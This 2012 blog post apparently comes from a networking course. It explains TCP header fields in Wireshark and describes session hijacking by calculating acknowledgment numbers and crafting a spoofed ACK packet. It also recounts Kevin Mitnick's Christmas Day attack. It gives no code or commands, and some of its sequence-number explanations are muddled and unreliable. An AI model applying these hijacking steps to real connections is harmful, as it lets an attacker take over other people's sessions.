Monday, April 9, 2012

Exploring TCP Three-Way Handshake Exploits



The Transport layer of the TCP/IP model is charged with getting the packet back and forth from the Application layer through ports. The Transport layer also uses acknowledgments to confirm the packets arrival to it's destination. WireShark is a packet analyzer (GUI seen below), useful in exploring the three-way handshake used by the Transmission Control Protocol (TCP). The eight parts of the TCP Section in WireShark are; Source & Destination Ports, Sequence & Acknowledgment Numbers, Header Length, Flags, Window Size and Checksum. Of these sections, Initial Sequence Number (ISN), Source and Destination Ports and Control Flags can be manipulated by a hacker to perform attacks.

TCP Three-Way Handshake

Session Hijacking is inserting yourself into a connection already established by a client and server. Using the TCP Session with www.webtycho.com , a hacker would have to be filtering the traffic with Wireshark to capture the above mentioned data or use the steps described below of Kevin Mitnick's Christmas Day attack. Once the data is captured , the hacker would craft a packet to represent the sequential packet of the last packet sent by the client. The hacker would take the last packet sent and analyze the data offset and add it to the current acknowledgment number.(Shown below).

The Source Port would be the client (34235) and destination would be the HTTP server on port 80. The sequence number would stay the same as long as only the server is sending data to the client. The Crafted Packet would only have the ACK Flag up to insert itself into the session. Below is a screen capture of Wireshark to confirm the acknowledgment number projected in the calculation above.

How-to-Calculate Acknowledgement numbers

The famous Christmas Day attack by Kevin Mitnick is an excellent example of session hijacking. Kevin attacked computers of Tsutomu Shimomura at the San Diego Supercomputer Center. The first step was to use the finger command in a UNIX environment to discover details about the user. The second step was Kevin filled the targets queue with half-open TCP connections (SYN Flag).The third step was to calculate the ISN as described above then spoof the reply.
In Conclusion, the TCP header contents are important for a security professional to know. The ISN can be calculated simply by adding the data offset to the last packet sent by the client. Once the three-way handshake is establish, usually there are ACK Flags back and forth until the connection is torn down by the four-way handshake. To successfully hijack a session you would want to use the source and destination ports already established.

No comments:

Post a Comment